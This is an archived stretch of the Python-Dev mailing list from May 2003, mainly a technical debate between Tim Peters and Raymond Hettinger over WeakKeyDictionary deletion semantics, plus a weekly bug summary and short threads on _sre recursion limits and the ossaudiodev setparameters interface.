> ref count falling to zero and then a new, equal key was formed later.

Sorry, I can't picture what you're trying to say.  Show some code?  If in a
weak-keyed dict d I do

    d[k1] = v
    del k1 # last reference, so the dict entry went away
    del d[k2]  # where k2 happens to compare equal to what k1 was

then I claim that *should* raise KeyError, and pretty obviously so.  Note
that the other new test I checked in showed that

    del d[whatever]

never raised KeyError before; I can't see how that can be called a feature,
and if someone thinks it was they neglected to document it, or write a test
that failed when I changed the behavior <wink>.

> If the data disappeared, then, I think ref(key) will return None

No, ref(x) never returns None, regardless of what x may be.  It may raise
TypeError if x is not of a weakly referencable type, and it may raise
MemoryError if we don't have enough memory left to construct a weakref, but
those are the only things that can go wrong.

w = ref(x) followed later by w() will return None, iff x has gone away in
the meantime -- maybe that's what you're thinking of.
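
In other words (a throwaway class, just for illustration):

    import weakref

    class Thing(object):
        pass

    x = Thing()
    w = weakref.ref(x)   # ref(x) itself never returns None
    print w() is x       # True: calling w gives back the referent while it lives
    del x
    print w() is None    # True: the referent is gone, so w() returns None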

> which is a bummer because that is then used (in your patch)
> as a lookup key.

If x and y are two weakly-referencable objects (not necessarily distinct)
that compare equal, then

    ref(x) == ref(y)
and
    hash(ref(x)) == hash(ref(y))

so long as both ref(x)() and ref(y)() don't return None (i.e., so long as x
and y are both still alive).

So when I map

   del d[k1]

to

   del d.data[ref(k1)]

it will succeed if and only if d.data has a key for a still-live object, and
that key compares equal to k1; else it will raise KeyError (or maybe
TypeError if k1 is a silly key to test in a weak-keyed dict, or MemoryError
if we run out of memory).  That's what I believe it should do.
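
Concretely, something like this (made-up Key class, Python 2.3-ish):

    import weakref

    class Key(object):
        def __init__(self, n): self.n = n
        def __eq__(self, other): return self.n == other.n
        def __hash__(self): return hash(self.n)

    d = weakref.WeakKeyDictionary()
    k1 = Key(1)
    d[k1] = 'v'
    del k1              # last strong reference; the entry vanishes on its own
    k2 = Key(1)         # compares equal to what k1 was
    try:
        del d[k2]       # raises KeyError, as claimed above
    except KeyError:
        print 'KeyError, as expected'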

> The safest approach (until Fred re-appears) is to keep the original
> approach but use keys() instead of iterkeys().  Then, wrap the
> actual deletion in a try / except KeyError to handle a thread
> race to delete the same weakref object.

I'm not clear on what that means.  By "delete the same weakref object", do
you mean that both threads try to do

    del d[k]

with the same k and the same weak-keyed dict d?  If so, then I think one of
them *should* see KeyError, exactly the same as if they tried pulling this
trick with a regular dict.

> I'm sure there is a better way and will take another look tomorrow.

Thanks for trying, but I still don't get it.  It would help if you could
show specific code that you believe worked correctly before but is broken
now.  I added two new tests showing what I believe to be code that was
broken before but works now, and no changes to the existing tests were
needed.



From python@rcn.com  Sun May 25 07:05:28 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:05:28 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCKEODEKAB.tim_one@email.msn.com>
Message-ID: <001a01c32283$a4ec0fe0$125ffea9@oemcomputer>

[Raymondo]
> > The original code does its contortions to avoid raising a KeyError
> > whenever the dictionary entry might have disappeared due to the
> > ref count falling to zero and then a new, equal key was formed later.

[Timbot]
> Sorry, I can't picture what you're trying to say.  Show some code?

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> class C: pass

>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> del wkd[C()]
>>> # No complaints



Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32 b
Type "help", "copyright", "credits" or "license" for more i
>>> class C: pass
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> del wkd[C()]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
KeyError: <weakref at 006BC600; to 'instance' at 006BAA30>
>>> # Complains now.



[Raymond]
 > > If the data disappeared, then, I think ref(key) will return None

[Timbot]
> No, ref(x) never returns None, regardless of what x may be.  It may raise
> TypeError if x is not of a weakly referencable type, and it may raise
> MemoryError if we don't have enough memory left to construct a weakref, but
> those are the only things that can go wrong.

[Current version of the docs]
"""
ref( object[, callback])

Return a weak reference to object. The original object can be retrieved by calling the reference object if the referent is still
alive; if the referent is no longer alive, calling the reference object will cause None to be returned.
"""


Raymond Hettinger



From tim_one@email.msn.com  Sun May 25 07:29:02 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 02:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <001a01c32283$a4ec0fe0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>

[Raymondo]
>>> The original code does its contortions to avoid raising a KeyError
>>> whenever the dictionary entry might have disappeared due to the
>>> ref count falling to zero and then a new, equal key was formed
>>> later.

[Timbot]
>> Sorry, I can't picture what you're trying to say.  Show some code?

[Razor]
> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)]
> on win32 Type "copyright", "credits" or "license" for more
> information. IDLE 0.8 -- press F1 for help
> >>> class C: pass
> ...
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> del wkd[C()]
> >>> # No complaints

Right, and I call that a bug.  One of the new tests I checked in does
exactly that, BTW.  As I said last time, the idea that trying to delete a
key from a weak-keyed dict never raises KeyError was neither documented nor
verified by a test, so there's no reason to believe it was anything other
than a bug in the implementation of __delitem__.

> Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32 b
> Type "help", "copyright", "credits" or "license" for more i
> >>> class C: pass
> ...
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> del wkd[C()]
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "C:\PY23\lib\weakref.py", line 167, in __delitem__
>     del self.data[ref(key)]
> KeyError: <weakref at 006BC600; to 'instance' at 006BAA30>
> >>> # Complains now.

Right, and that's intentional, and tested now too.  It's always been the
case (and still is) that wkd[C()] raised KeyError too -- why should
__delitem__, and only __delitem__, be exempt from complaining about a
senseless operation?

>>> If the data disappeared, then, I think ref(key) will return None

>> No, ref(x) never returns None, regardless of what x may be.  It may
>> raise TypeError if x is not of a weakly referencable type, and it
>> may raise MemoryError if we don't have enough memory left to
>> construct a weakref, but those are the only things that can go wrong.

> [Current version of the docs]
> """
> ref( object[, callback])
>
> Return a weak reference to object. The original object can be
> retrieved by calling the reference object if the referent is still
> alive; if the referent is no longer alive, calling the reference
> object will cause None to be returned. """

That's what I said last time:

    w = ref(x) followed later by w() will return None, iff x has gone away
    in the meantime -- maybe that's what you're thinking of.

Note that "calling the reference object" in the docs does not mean the call
"ref(x)" itself, it means calling the object returned by ref(x) (what I
named "w" in the quote just above).



From python@rcn.com  Sun May 25 07:35:17 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:35:17 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>
Message-ID: <002b01c32287$cef99ba0$125ffea9@oemcomputer>

The old behavior for missing keys may have been a bug.
Do you care about the previous behavior for deleting 
based on equality rather than equality *and* hash?


Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> class One:
 def __eq__(self, other):
  return other == 1
 def __hash__(self):
  return 1492

>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = None
>>> len(wkd)
1
>>> del wkd[1]
>>> len(wkd)
0


Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
Type "help", "copyright", "credits" or "license" for more
>>> class One:
...     def __eq__(self, other):
...         return other == 1
...     def __hash__(self):
...         return 1492
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = None
>>> len(wkd)
1
>>> del wkd[1]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
TypeError: cannot create weak reference to 'int' object
>>> len(wkd)
1
>>>


Raymond Hettinger


From tim_one@email.msn.com  Sun May 25 07:48:25 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 02:48:25 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <002b01c32287$cef99ba0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCOEOGEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> The old behavior for missing keys may have been a bug.
> Do you care about the previous behavior for deleting
> based on equality rather than equality *and* hash?

Nope, because it was neither documented nor tested, and was behavior unique
to the WeakKeyDictionary flavor of dict -- no other flavor of dict works
that way, and it was just an accident due to the __delitem__ implementation.
Note too that it's a documented requirement of the mapping protocol that
keys that compare equal must also return equal hash values.
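
If it helps, here's that rule in action with a plain dict and a made-up
class (essentially the One quoted below):

    class BadKey:
        def __eq__(self, other):
            return other == 1      # claims to equal 1...
        def __hash__(self):
            return 1492            # ...but hash(1) != 1492

    d = {}
    d[BadKey()] = 'x'
    print 1 in d    # False here: 1 hashes to a different slot, so __eq__
                    # is never even consulted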

> Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)]
> on win32 Type "copyright", "credits" or "license" for more
> information. IDLE 0.8 -- press F1 for help
> >>> class One:
>      def __eq__(self, other):
>       return other == 1
>      def __hash__(self):
>       return 1492

> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> o = One()
> >>> wkd[o] = None
> >>> len(wkd)
> 1
> >>> del wkd[1]
> >>> len(wkd)
> 0

Just a case of GIGO (garbage in, garbage out) to me.

> Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
> Type "help", "copyright", "credits" or "license" for more
> >>> class One:
> ..     def __eq__(self, other):
> ..         return other == 1
> ..     def __hash__(self):
> ..         return 1492
> ..
> >>> import weakref
> >>> wkd = weakref.WeakKeyDictionary()
> >>> o = One()
> >>> wkd[o] = None
> >>> len(wkd)
> 1
> >>> del wkd[1]
> Traceback (most recent call last):
>   File "<stdin>", line 1, in ?
>   File "C:\PY23\lib\weakref.py", line 167, in __delitem__
>     del self.data[ref(key)]
> TypeError: cannot create weak reference to 'int' object
> >>> len(wkd)
> 1
> >>>

As I said the first time <wink>,

    will succeed if and only if d.data has a key for a still-live object,
    and that key compares equal to k1; else it will raise KeyError
    (or maybe TypeError if k1 is a silly key to test in a weak-keyed dict,
    ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
    or MemoryError if we run out of memory).  That's what I believe it
    should do.

I didn't add "and the hash codes are the same too" because that requirement
is part of the mapping protocol.



From python@rcn.com  Sun May 25 07:46:41 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:46:41 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com>
Message-ID: <003701c32289$66e42ec0$125ffea9@oemcomputer>

Here's the rest of the last example:

>>> class AltOne(One):
...     def __hash__(self):
...         return 1776
...
>>> del wkd[AltOne()]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
KeyError: <weakref at 006BCB70; to 'instance' at 006C22D8>



> [Razor]

Hmm, a new moniker is born ...


[Tim]
> > Note that "calling the reference object" in the docs does not mean the call
> "ref(x)" itself, it means calling the object returned by ref(x) (what I
> named "w" in the quote just above).

Hmm,  I read the docs just a little too quickly.  
Speed reading is not all it's cracked up to be.


Raymond



From python@rcn.com  Sun May 25 07:52:23 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 02:52:23 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCOEOGEKAB.tim_one@email.msn.com>
Message-ID: <000201c3228a$73b3cba0$125ffea9@oemcomputer>

> As I said the first time <wink>,
> 
>     will succeed if and only if d.data has a key for a still-live object,
>     and that key compares equal to k1; else it will raise KeyError
>     (or maybe TypeError if k1 is a silly key to test in a weak-keyed dict,
>     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
>     or MemoryError if we run out of memory).  That's what I believe it
>     should do.
> 
> I didn't add "and the hash codes are the same too" because that requirement
> is part of the the mapping protocol.

Okay, you've had a second review on the patch and backporting
to 2.2.3 is reasonable.  Please add a news item for the two changes
in behavior.

BTW, I wasn't trying to be difficult, I was starting from the presumption 
that Fred wasn't smoking dope when he put in that weird block of code.
Looks like the presumption was wrong ;-)


Raymond


From python@rcn.com  Sun May 25 08:08:33 2003
From: python@rcn.com (Raymond Hettinger)
Date: Sun, 25 May 2003 03:08:33 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
References: <LNBBLJKPBEHFEDALKOLCAEOGEKAB.tim_one@email.msn.com> <003701c32289$66e42ec0$125ffea9@oemcomputer>
Message-ID: <000901c3228c$74f0a680$125ffea9@oemcomputer>

Arghh.  One more example always arises after going to bed.

The original required only equality.  The new version requires
equality, hashability, *and* weak referencability.

Python 2.3b1 (#40, Apr 25 2003, 19:06:24) [MSC v.1200 32 bit (Intel)] on win32
Type "copyright", "credits" or "license" for more information.
IDLE 0.8 -- press F1 for help
>>> import weakref
>>> class One:
 def __eq__(self, other): return other == 1
 def __hash__(self):  return hash(1)
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = 1
>>> len(wkd)
1
>>> del wkd[1]
>>> len(wkd)
0


Python 2.3b1+ (#40, May 23 2003, 00:08:36) [MSC v.1200 32
Type "help", "copyright", "credits" or "license" for more
>>> class One:
...     def __eq__(self,other):  return other==1
...     def __hash__(self):  return hash(1)
...
>>> import weakref
>>> wkd = weakref.WeakKeyDictionary()
>>> o = One()
>>> wkd[o] = 1
>>> len(wkd)
1
>>> del wkd[1]
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
  File "C:\PY23\lib\weakref.py", line 167, in __delitem__
    del self.data[ref(key)]
TypeError: cannot create weak reference to 'int' object
>>> len(wkd)
1



Raymond










From skip@mojam.com  Sun May 25 13:00:28 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 25 May 2003 07:00:28 -0500
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200305251200.h4PC0Sg08651@manatee.mojam.com>

Bug/Patch Summary
-----------------

372 open / 3658 total bugs (-30)
151 open / 2173 total patches (+12)

New Bugs
--------

IMAP4_SSL broken (2003-05-19)
	http://python.org/sf/739909
re.finditer() listed as new in 2.2.? (2003-05-19)
	http://python.org/sf/740026
test/build-failures on FreeBSD stable/current (2003-05-19)
	http://python.org/sf/740234
Can't browse methods and Classes (2003-05-20)
	http://python.org/sf/740407
MacPython-OS9 distutils breaks on OSX (2003-05-20)
	http://python.org/sf/740424
HTMLParser -- possible bug in handle_comment (2003-05-21)
	http://python.org/sf/741029
Configure does NOT set properly *FLAGS for thread support (2003-05-21)
	http://python.org/sf/741307
test_long failure (2003-05-22)
	http://python.org/sf/741806
curses support on Python-2.3b1/Tru64Unix 5.1A (2003-05-22)
	http://python.org/sf/741843
Python crashes if recursively reloading modules (2003-05-23)
	http://python.org/sf/742342
WeakKeyDictionary __delitem__ uses iterkeys (2003-05-24)
	http://python.org/sf/742860
Memory fault on complex weakref/weakkeydict delete (2003-05-24)
	http://python.org/sf/742911

New Patches
-----------

inspect.getargspec: None instead of () (2002-11-12)
	http://python.org/sf/637217
zlib.decompressobj under-described. (2002-11-18)
	http://python.org/sf/640236
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
build of html docs broken (liboptparse.tex) (2003-05-04)
	http://python.org/sf/732174
HP-UX support for unixccompiler.py (2003-05-20)
	http://python.org/sf/740301
add urldecode() method to urllib (2003-05-20)
	http://python.org/sf/740827
unicode "support" for shlex.py (2003-05-23)
	http://python.org/sf/742290
SocketServer timeout, zombies (2003-05-23)
	http://python.org/sf/742598
ast-branch: msvc project sync (2003-05-23)
	http://python.org/sf/742621
check for true in diffrent paths, -pthread support (2003-05-24)
	http://python.org/sf/742741
Ordering of handlers in urllib2 (2003-05-24)
	http://python.org/sf/742823

Closed Bugs
-----------

crash in shelve module (2001-03-13)
	http://python.org/sf/408271
maximum recursion limit exceeded (2.1) (2001-04-24)
	http://python.org/sf/418626
raw-unicode-escape codec fails roundtrip (2001-07-25)
	http://python.org/sf/444514
strange IRIX test_re/test_sre failure (2001-08-28)
	http://python.org/sf/456398
New httplib lacks documentation (2001-09-04)
	http://python.org/sf/458447
maximum recursion limit exceeded in match (2001-12-14)
	http://python.org/sf/493252
inconsistent behavior of __getslice__ (2002-05-24)
	http://python.org/sf/560064
Mixing framework and static Pythons (2002-06-19)
	http://python.org/sf/571343
inheriting from property and docstrings (2002-07-03)
	http://python.org/sf/576990
unittest.py, better error message (2002-07-30)
	http://python.org/sf/588825
installation errors (2002-08-07)
	http://python.org/sf/592161
test_nis test fails on TRU64 5.1 (2002-08-14)
	http://python.org/sf/594998
non greedy match bug (2002-08-30)
	http://python.org/sf/602444
cgitb tracebacks not accessible (2002-08-31)
	http://python.org/sf/602893
faster [None]*n or []*n (2002-09-04)
	http://python.org/sf/604716
Max recursion limit with "*?" pattern (2002-10-08)
	http://python.org/sf/620412
cStringIO().write TypeError (2002-11-08)
	http://python.org/sf/635814
inspect.getargspec: None instead of () (2002-11-12)
	http://python.org/sf/637217
zlib.decompressobj under-described. (2002-11-18)
	http://python.org/sf/640236
Poor error message for augmented assign (2002-11-26)
	http://python.org/sf/644345
gettext.py crash on bogus preamble (2002-12-24)
	http://python.org/sf/658233
BoundaryError: multipart message with no defined boundary (2003-01-14)
	http://python.org/sf/667931
bsddb doc error (2003-01-28)
	http://python.org/sf/676233
test_logging fails (2003-01-31)
	http://python.org/sf/678217
new.function() leads to segfault (2003-02-25)
	http://python.org/sf/692776
Python 2.3a2 Build fails on HP-UX11i (2003-02-27)
	http://python.org/sf/694431
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
Assertion  failed, python aborts (2003-03-17)
	http://python.org/sf/705231
Error when using PyZipFile to create archive (2003-03-17)
	http://python.org/sf/705295
Minor nested scopes doc issues (2003-04-06)
	http://python.org/sf/716168
Uthread problem - Pipe left open (2003-04-08)
	http://python.org/sf/717614
Mac OS X painless compilation (2003-04-11)
	http://python.org/sf/719549
runtime_library_dirs broken under OS X (2003-04-17)
	http://python.org/sf/723495
email/quopriMIME.py exception on int (lstrip) (2003-04-20)
	http://python.org/sf/724621
Possible OSX module location bug (2003-04-21)
	http://python.org/sf/725026
comparing versions - one a float (2003-04-28)
	http://python.org/sf/729317
Lambda functions in list comprehensions (2003-05-08)
	http://python.org/sf/734869
FILEMODE not honoured (2003-05-09)
	http://python.org/sf/735274
Command line timeit.py sets sys.path badly (2003-05-09)
	http://python.org/sf/735293
csv.Sniffer docs need updating (2003-05-15)
	http://python.org/sf/738471
On Windows, os.listdir() throws incorrect exception (2003-05-15)
	http://python.org/sf/738617
array.insert and negative indices (2003-05-17)
	http://python.org/sf/739313

Closed Patches
--------------

Optional output streams for dis (2003-02-08)
	http://python.org/sf/683074
Add copyrange method to array. (2003-04-14)
	http://python.org/sf/721061


From andymac@bullseye.apana.org.au  Sun May 25 01:35:18 2003
From: andymac@bullseye.apana.org.au (Andrew MacIntyre)
Date: Sun, 25 May 2003 10:35:18 +1000 (EST)
Subject: [Python-Dev] _sre changes
In-Reply-To: <20030524152612.GA22309@ibook.distro.conectiva>
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl> <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
Message-ID: <20030525102158.S40394@bullseye.apana.org.au>

On Sat, 24 May 2003, Gustavo Niemeyer wrote:

> to backport some of the fixes we have introduced in the regular
> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
> open about that, but I'd like to port only the changes that don't
> require major changes in the engine.

These sre changes are giving me fits on FreeBSD.  The fix (recursion
limit down to 7500 for gcc 3.x) applied for 2.3b1 now needs to be extended
to gcc 2.95, and the limit for gcc 3.x lowered further - not a
particularly satisfactory outcome.

I have identified that the problem is not the compiler specifically, but
an interaction with FreeBSD's pthreads implementation (libc_r) -
./configure --without-threads produces an interpreter which survives
test_re with a recursion limit of 10000 regardless of compiler.

I'm still trying to frame a query to a FreeBSD forum about this.

--
Andrew I MacIntyre                     "These thoughts are mine alone..."
E-mail: andymac@bullseye.apana.org.au  (pref) | Snail: PO Box 370
        andymac@pcug.org.au             (alt) |        Belconnen  ACT  2616
Web:    http://www.andymac.org/               |        Australia


From mwh@python.net  Sun May 25 17:27:22 2003
From: mwh@python.net (Michael Hudson)
Date: Sun, 25 May 2003 17:27:22 +0100
Subject: [Python-Dev] _sre changes
In-Reply-To: <20030525102158.S40394@bullseye.apana.org.au> (Andrew
 MacIntyre's message of "Sun, 25 May 2003 10:35:18 +1000 (EST)")
References: <9CF2178A-8D13-11D7-A3D6-0030655234CE@cwi.nl>
 <3ECE3677.1030500@python.org>
 <20030524152612.GA22309@ibook.distro.conectiva>
 <20030525102158.S40394@bullseye.apana.org.au>
Message-ID: <2md6i7gff9.fsf@starship.python.net>

Andrew MacIntyre <andymac@bullseye.apana.org.au> writes:

> On Sat, 24 May 2003, Gustavo Niemeyer wrote:
>
>> to backport some of the fixes we have introduced in the regular
>> expression engine in 2.3 to 2.2.3, or is it too late? We have a sf patch
>> open about that, but I'd like to port only the changes that don't
>> require major changes in the engine.
>
> These sre changes are giving me fits on FreeBSD.  The fix (recursion
> limit down to 7500 for gcc 3.x) applied for 2.3b1 now needs to be extended
> to gcc 2.95, and the limit for gcc 3.x lowered further - not a
> particularly satisfactory outcome.
>
> I have identified that the problem is not the compiler specifically, but
> an interaction with FreeBSD's pthreads implementation (libc_r) -
> ./configure --without-threads produces an interpreter which survives
> test_re with a recursion limit of 10000 regardless of compiler.

This is to be expected.  If you run a threads disabled Python with
ulimit -s you can recurse until you run out of VIRTUAL MEMORY!

When there are threads in the picture, things are significantly more
complex... (which is another way of stating that I don't understand
it, but you can understand that with multiple stacks you can't just
say "here's a really high address, work down from here"[1]).

Cheers,
M.

[1] or vice versa depending on architecture.

-- 
    -Dr. Olin Shivers,
     Ph.D., Cranberry-Melon School of Cucumber Science
                                           -- seen in comp.lang.scheme


From tim_one@email.msn.com  Sun May 25 18:10:42 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 13:10:42 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000201c3228a$73b3cba0$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEPLEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> Okay, you've had a second review on the patch and backporting
> to 2.2.3 is reasonable.  Please add a news item for the two changes
> in behavior.

I'll wait for Fred to get back.  I'm not sure you've used weakrefs <wink>.

> BTW, I wasn't trying to be difficult, I was starting from the
> presumption that Fred wasn't smoking dope when he put in that weird
> block of code. Looks like the presumption was wrong ;-)

That's cool, I started from the same presumption, and am still not entirely
over it -- it was such an outrageously inefficient way to delete a key that
the suspicion still nags there was *some* reason for it (other than really
good dope <wink>).



From tim_one@email.msn.com  Sun May 25 18:17:22 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Sun, 25 May 2003 13:17:22 -0400
Subject: [Python-Dev] RE: [Python-checkins] python/dist/src/Lib weakref.py,1.19,1.20
In-Reply-To: <000901c3228c$74f0a680$125ffea9@oemcomputer>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEPMEKAB.tim_one@email.msn.com>

[Raymond Hettinger]
> Arghh.  One more example always arises after going to bed.
>
> The original required only equality.  The new version requires
> equality, hashability, *and* weak referencability.

It always required (and still does) all three for __setitem__ and
__getitem__:  key equality and hashability are required for all dicts, and
*of course* key weak referencability is required for a weak-keyed dict:
that's why it's called a weak-keyed dict <0.5 wink>.

__delitem__ alone used a bizarre algorithm, and indeed one that broke other
normal dict invariants such as that

    del d[k]

always deletes the same (key, value) pair that

    d[k] = v

would have replaced.
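
For anyone who wants to see that invariant concretely, here's a minimal
sketch with a plain dict and a toy key type (the Key class is my own
illustration, nothing from weakref.py):

    class Key:
        """Keys that compare equal without being the same object."""
        def __init__(self, name):
            self.name = name
        def __eq__(self, other):
            return self.name == other.name
        def __hash__(self):
            return hash(self.name)

    d = {}
    k1, k2 = Key("spam"), Key("spam")   # equal, but distinct objects
    d[k1] = 1
    d[k2] = 2      # replaces the value stored under the equal key k1
    del d[k2]      # deletes that same (key, value) pair
    assert len(d) == 0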



From Jack.Jansen@cwi.nl  Sun May 25 21:55:11 2003
From: Jack.Jansen@cwi.nl (Jack Jansen)
Date: Sun, 25 May 2003 22:55:11 +0200
Subject: [Python-Dev] RELEASED Python 2.2.3c1
In-Reply-To: <3ECE3677.1030500@python.org>
Message-ID: <2D0200D5-8EF3-11D7-AA7E-000A27B19B96@cwi.nl>

On vrijdag, mei 23, 2003, at 16:55 Europe/Amsterdam, Barry Warsaw wrote:
>> Is there a chance I could get #723495 still in before 2.2.3 final? I 
>> was also hoping to find a fix for #571343, but I don't have a patch 
>> yet (although I'll try to get one up in the next few hours).
>
> I think it would be fine to get these into 2.2.3 final.

Okay, I'm done (in as far as the unix distribution is concerned): 
723495 is checked in, and 571343 I've closed as "won't fix" because it 
turns out that the trouble-case I expected is very unlikely to happen.
--
- Jack Jansen        <Jack.Jansen@oratrix.com>        
http://www.cwi.nl/~jack -
- If I can't dance I don't want to be part of your revolution -- Emma 
Goldman -



From gward@python.net  Mon May 26 03:16:35 2003
From: gward@python.net (Greg Ward)
Date: Sun, 25 May 2003 22:16:35 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
Message-ID: <20030526021635.GA15814@cthulhu.gerg.ca>

Currently, oss_audio_device objects have a setparameters() method with a
rather silly interface:

  oss.setparameters(sample_rate, sample_size, num_channels, format [, emulate])

This is silly because 1) 'sample_size' is implicit in 'format', and 2)
the implementation doesn't actually *use* sample_size for anything -- it
just checks that you have passed in the correct sample size, ie. if you
specify an 8-bit format, you must pass sample_size=8.  (This is code
inherited from linuxaudiodev that I never got around to cleaning up.)
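
To make the redundancy concrete, here's a sketch of the two call styles
(the post-change argument order is only my guess from the signature above,
not something settled):

    import ossaudiodev

    dsp = ossaudiodev.open('w')
    # current code: the 16 merely repeats what AFMT_S16_LE already says,
    # and is only ever used for a consistency check
    dsp.setparameters(44100, 16, 2, ossaudiodev.AFMT_S16_LE)
    # documented interface, with sample_size dropped
    dsp.setparameters(44100, 2, ossaudiodev.AFMT_S16_LE)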

In addition to being silly, this is not the documented interface.  The
docs don't mention the 'sample_size' argument at all.  Presumably the
doc writer realized the silliness and was going to pester me to remove
'sample_size', but never got around to it.  (Lot of that going around.)

So, even though we're in a beta cycle, am I allowed to change the code
so it's 1) sensible and 2) consistent with the documentation?

        Greg
-- 
Greg Ward <gward@python.net>                         http://www.gerg.ca/
Sure, I'm paranoid... but am I paranoid ENOUGH?


From guido@python.org  Mon May 26 07:39:59 2003
From: guido@python.org (Guido van Rossum)
Date: Mon, 26 May 2003 02:39:59 -0400
Subject: [Python-Dev] Change to ossaudiodev setparameters() method
In-Reply-To: "Your message of Sun, 25 May 2003 22:16:35 EDT."
 <20030526021635.GA15814@cthulhu.gerg.ca>
References: <20030526021635.GA15814@cthulhu.gerg.ca>
Message-ID: <200305260640.h4Q6dxm08507@pcp02138704pcs.reston01.va.comcast.net>

> Currently, oss_audio_device objects have a setparameters() method with a
> rather silly interface:
> 
>   oss.setparameters(sample_rate, sample_size, num_channels, format [, emulate])
> 
> This is silly because 1) 'sample_size' is implicit in 'format', and 2)
> the implementation doesn't actually *use* sample_size for anything -- it
> just checks that you have passed in the correct sample size, ie. if you
> specify an 8-bit format, you must pass sample_size=8.  (This is code
> inherited from linuxaudiodev that I never got around to cleaning up.)
> 
> In addition to being silly, this is not the documented interface.  The
> docs don't mention the 'sample_size' argument at all.  Presumably the
> doc writer realized the silliness and was going to pester me to remove
> 'sample_size', but never got around to it.  (Lot of that going around.)
> 
> So, even though we're in a beta cycle, am I allowed to change the code
> so it's 1) sensible and 2) consistent with the documentation?

Yes.  I like silliness in an MP skit, but not in my APIs. :-)

--Guido van Rossum (home page: http://www.python.org/~guido/)



From g9robjef@cdf.toronto.edu  Mon May 26 17:51:05 2003
From: g9robjef@cdf.toronto.edu (Jeffery Roberts)
Date: Mon, 26 May 2003 12:51:05 -0400 (EDT)
Subject: [Python-Dev] Re: Introduction
In-Reply-To: <20030523143901.8660.97348.Mailman@mail.python.org>
References: <20030523143901.8660.97348.Mailman@mail.python.org>
Message-ID: <Pine.LNX.4.55.0305261237120.23128@seawolf.cdf>

Thanks for that reply Brett. It is really helpful.

